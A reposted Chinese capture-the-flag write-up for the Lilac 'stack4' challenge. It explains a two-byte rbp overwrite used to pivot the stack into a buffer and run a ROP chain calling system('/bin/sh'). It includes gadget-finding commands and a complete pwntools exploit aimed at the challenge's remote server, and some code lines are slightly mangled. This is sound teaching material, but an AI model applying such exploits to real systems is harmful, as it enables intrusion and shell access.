Lilac Pwn stack4-stack_pivoting Writeup

Posted wulitaotao

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Lilac Pwn stack4-stack_pivoting Writeup相关的知识,希望对你有一定的参考价值。

题目链接

技术图片

文件类型是 64 位 ELF。

技术图片

开了 NX 保护。

用 IDA64 查看一下:

技术图片

技术图片

可以看到 print_name 最多只能溢出 2 个字节。

也就是说只能覆盖 rbp 的最低 2 个字节。

此时需要使用栈迁移的技巧。

此题相对容易,因为已经给出了 buf 的地址,我们只需要把 main 函数栈帧的 rbp 迁移到 buf 处,然后在 buf 处构造 ROP chain 即可。

原来 print_name 栈帧的栈底指向 main 栈帧的栈底。

                        
            high address      
                        +--------------------+ <--+ 
               +------> |    previous rbp    |    |
               |        +--------------------+    |
               |        |       ......       |    |
               |        +--------------------+    | main()
               |        |        buf         |    |
               |        +--------------------+    |
               |        |   return address   |    |
               |        +--------------------+ <--+
               +------- |    previous rbp    |    |
                        +--------------------+    |
                        |       ......       |    | print_name()
                        +--------------------+    |
                        |        dest        |    |
                        +--------------------+ <--+
            low address       

覆盖后 main 栈帧的栈底迁移到 buf,然后在 buf 上构造 ROP chain,这样 main 函数返回后就去执行 ROP chain 了。

                        
            high address      
                        +--------------------+      
                        |    previous rbp    |     
                        +--------------------+     
                        |       ......       |     
                        +--------------------+     
                        |      ROP chain     |     
                        +--------------------+ <--+     
               +------> |        buf         |    |
               |        +--------------------+    | main()
               |        |   return address   |    |
               |        +--------------------+ <--+
               +------- |    previous rbp    |    |
                        +--------------------+    |
                        |       ......       |    | print_name()
                        +--------------------+    |
                        |        dest        |    |
                        +--------------------+ <--+
            low address       

objdump -d stack4 | grep ‘plt‘

技术图片

system 函数的地址为 0x400600

ROPgadget --binary stack4 --only "pop|ret" | grep "rdi"

技术图片

pop rdi; ret 的地址为 0x4008a3

ROPgadget --binary stack4 --string "/bin/sh"

技术图片

字符串 "/bin/sh" 的地址为 0x4008c9

所以 payload 为 fake rbp (随便填) + pop rdi; ret + "/bin/sh" + system + 填充16个字节 + buf 的地址

print_name 中 dest 与 rbp 的距离为 48 个字节,fake rbp (随便填) + pop rdi; ret + "/bin/sh" + system 有 32 个字节,因此还需填充 16 个字节才到 rbp。然后 buf 的地址 只能覆盖 rbp 的最低两个字节,但是足够了,因为 main 函数中 buf 到 rbp 的距离为 256 个字节。

exp 如下:

from pwn import *
import re

# context.log_level = "debug"

# p = process("./stack4")
p = remote("47.94.239.235", 2024)

p.recvuntil(":")
buf_addr = p.recvuntil("
")
buf_addr = int(buf_addr[-15:-1], 16) # buf 的地址
# print(hex(addr))

poprdi_addr = 0x4008a3
binsh_addr = 0x4008c9
system_addr = 0x400600


payload = flat([p64(0xdeadbeef), p64(poprdi_addr), p64(binsh_addr), p64(system_addr), ‘a‘*16, p64(buf_addr) ])

p.sendlineafter("plz", payload)

p.interactive()

技术图片

成功拿到 shell。

以上是关于Lilac Pwn stack4-stack_pivoting Writeup的主要内容,如果未能解决你的问题,请参考以下文章

pwn攻防世界 pwn新手区wp

使用pwn_deploy_chroot部署国赛pwn比赛题目

攻防世界—pwn—hello_pwn

Pwn_9 作业讲解

Pwn-pwn-200

pwn学pwn日记(堆结构学习)(随缘更新)